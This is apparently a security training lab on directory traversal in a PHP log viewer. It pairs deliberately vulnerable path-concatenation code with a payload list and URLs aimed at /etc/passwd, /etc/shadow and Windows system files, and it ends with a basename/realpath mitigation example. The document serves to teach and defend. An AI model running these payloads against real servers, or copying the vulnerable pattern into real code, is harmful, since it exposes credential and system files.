Directory Traversal in log file viewing functionality
This lab demonstrates a directory traversal vulnerability in a log file viewer system. The application constructs log file paths by concatenating user input without proper validation, allowing access to sensitive system files.
Objective: Access system files outside the logs directory using directory traversal sequences to view sensitive configuration files.
// Handle log file request
if (isset($_GET['log'])) {
    $log = $_GET['log'];
    // Vulnerable: No validation of log file path
    $log_path = 'logs/' . $log;
    if (file_exists($log_path) && is_file($log_path)) {
        $log_content = file_get_contents($log_path);
        // Display log content
    } else {
        // Error: Log file not found
    }
}
// Example vulnerable usage:
// ?log=access.log
// ?log=../../../etc/passwd
// ?log=..\..\..\windows\system32\drivers\etc\hosts
Try these payloads in the log parameter:
../../../etc/passwd - Linux system file
..\..\..\windows\system32\drivers\etc\hosts - Windows system file
../../../etc/hosts - Linux hosts file
../../../proc/version - Linux system info
../../../etc/shadow - Linux password file
Example URLs:
3.php?log=../../../etc/passwd
3.php?log=..\..\..\windows\system32\drivers\etc\hosts
basename() to extract filename only
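The basename() mitigation noted above, combined with a filename allowlist and a realpath() containment check, shown as an added example that is not part of the lab's code. The function name resolve_log_path(), the temporary directory and the sample log file are assumptions made for the demo.

```php
<?php
// Added example, not the lab's code. resolve_log_path() and the demo
// directory are hypothetical names chosen for illustration.
function resolve_log_path(string $base_dir, string $requested): ?string
{
    // basename() splits only on "/" on Linux, so normalise "\" first.
    $name = basename(str_replace('\\', '/', $requested));

    // Allowlist the filename shape: safe characters, must end in ".log".
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]*\.log\z/', $name)) {
        return null;
    }

    // realpath() resolves symlinks and returns false for missing files.
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }

    // Containment: the canonical path must still start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// Constructed demo data: a throwaway logs directory holding one file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lab_logs_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'access.log', "constructed line\n");

$inputs = [
    'access.log',                                         // legitimate request
    '../../../etc/passwd',                                // from the lab page
    '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts', // from the lab page
    'missing.log',                                        // valid shape, no file
];
foreach ($inputs as $input) {
    $resolved = resolve_log_path($base, $input);
    printf("%-48s %s\n", $input, $resolved === null ? 'rejected' : 'served');
}

unlink($base . DIRECTORY_SEPARATOR . 'access.log');
rmdir($base);
```

basename() alone already strips the directory components; the realpath() prefix comparison is the second layer that also catches a symlink inside logs/ that points elsewhere.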